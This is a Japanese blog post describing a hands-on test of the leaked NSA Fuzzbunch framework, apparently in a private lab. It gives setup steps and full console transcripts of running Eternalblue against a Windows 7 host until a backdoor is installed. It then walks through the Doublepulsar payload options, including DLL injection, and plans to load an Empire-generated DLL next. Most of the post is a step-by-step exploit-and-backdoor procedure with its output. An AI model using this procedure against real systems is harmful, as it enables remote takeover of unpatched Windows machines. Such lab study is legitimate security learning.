Eternalblueの理解を深める

NSAのハッキングツールを検証してみる。

GitHubからダウンロード。

事前にPython2.6.6(32bit)とPywin32 v2.12をダウンロード。

windowsフォルダ内のfb.pyを使う。このfb.pyがFuzzbunchになると思う。

Fuzzbunchは脆弱性検証ツールだそう。僕には攻撃ツールにしか見えないが。

以下のエラーが発生するので、listeningpostsフォルダを事前に作成しておく。

WindowsError: [Error 3] 指定されたパスが見つかりません。: ‘C:\\shadowbroker-master\\windows\\listeningposts/*.*’

pythonで実行し、Eternalblueを実行する。

[*] Redirectionが OFF になるように”NO”にしておく?(←要調査)

PS C:\shadowbroker-master\shadowbroker-master\windows> python .\fb.py

--[ Version 3.5.1

[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ON

ImplantConfig Autorun List
==========================

  0) prompt confirm
  1) execute


Exploit Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Special Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Payload Autorun List
====================

  0) apply
  1) prompt confirm
  2) execute


[+] Set FbStorage => C:\shadowbroker-master\shadowbroker-master\windows\storage

[*] Retargetting Session

[?] Default Target IP Address [] :
・
・
・
・
[*] Initializing Global State
[+] Set TargetIp => 10.0.2.4
[+] Set CallbackIp => 10.0.2.5

[+] Redirection ON
[+] Set LogDir => C:\shadowbroker-master\shadowbroker-master\windows\logs\test\z10.0.2.4
[+] Set Project => test

fb > use Et
Eternalblue     Eternalchampion Eternalromance  Eternalsynergy
fb > use Eternalblue
・
・
・
・
[*]  Target :: Operating System, Service Pack, and Architecture of target OS

    0) XP            Windows XP 32-Bit All Service Packs
   *1) WIN72K8R2     Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

[?] Target [1] : 1


[!] Preparing to Execute Eternalblue

[*]  Mode :: Delivery mechanism

   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1
・
・
・
・
[?] Press Any Key To Continue :

Module: Eternalblue
===================

Name                  Set Value    Redirected Value
----                  ---------    ----------------
DaveProxyPort         0
NetworkTimeout        60
TargetIp              10.0.2.4     127.0.0.1
TargetPort            445          445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
ShellcodeBuffer
Target                WIN72K8R2

[?] Execute Plugin? [Yes] : Yes
[*] Executing Plugin
[*] Connecting to target for exploitation.
 [+] Connection established for exploitation.
[*] Pinging backdoor...
 [+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (41 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70 Windows 7 Enterp
0x00000010 72 69 73 65 20 37 36 30 31 20 53 65 72 76 69 63 rise 7601 Servic
0x00000020 65 20 50 61 63 6b 20 31 00 e Pack 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
 ................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
 [+] Sending SMBv2 buffers
 ....DONE.
 [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
 DONE.
[*] Receiving response from exploit packet
 [+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
 [+] Backdoor returned code: 10 - Success!
 [+] Ping returned Target architecture: x86 (32-bit)
 [+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 00 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded

“Eternalblue”により、Backdoorがインストールされた事が判る。

Doublepulsarがバックドアだと思っていた。

fb Special (Eternalblue) > show Payload

Plugin Category: Payload
========================

  Name              Version
  ----              -------
  Doublepulsar      1.3.1
  Jobadd            1.1.1
  Jobdelete         1.1.1
  Joblist           1.1.1
  Pcdlllauncher     2.3.1
  Processlist       1.1.1
  Regdelete         1.1.1
  Regenum           1.1.1
  Regread           1.1.1
  Regwrite          1.1.1
  Rpcproxy          1.0.1
  Smbdelete         1.1.1
  Smblist           1.1.1
  Smbread           1.1.1
  Smbwrite          1.1.1

EternalblueのPayloadの一つがDoublepulsarである事が判る。

fb Special (Eternalblue) > use Doublepulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.0.2.4

[*] Applying Session Parameters

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          10.0.2.4
TargetPort        445
OutputFile
Protocol          SMB
Architecture      x86
Function          OutputInstall
・
・
・
・
[*]  TargetIp :: Target IP Address

[?] TargetIp [10.0.2.4] :

[*]  TargetPort :: Port used by the Double Pulsar back door

[?] TargetPort [445] :

[*]  Protocol :: Protocol for the backdoor to speak

   *0) SMB     Ring 0 SMB (TCP 445) backdoor
    1) RDP     Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] :

[*]  Architecture :: Architecture of the target OS

   *0) x86     x86 32-bits
    1) x64     x64 64-bits

[?] Architecture [0] :

[*]  Function :: Operation for backdoor to perform

   *0) OutputInstall     Only output the install shellcode to a binary file on disk.
    1) Ping              Test for presence of backdoor
    2) RunDLL            Use an APC to inject a DLL into a user mode process.
    3) RunShellcode      Run raw shellcode
    4) Uninstall         Remove's backdoor from system

[?] Function [0] :

このRunDLLでマルウェア本体をぶち込むという訳。ユーザビリティもよく、しっかり作られたツールであると、関心する。

次回はEMPIREで生成したdllを送り込んでみる。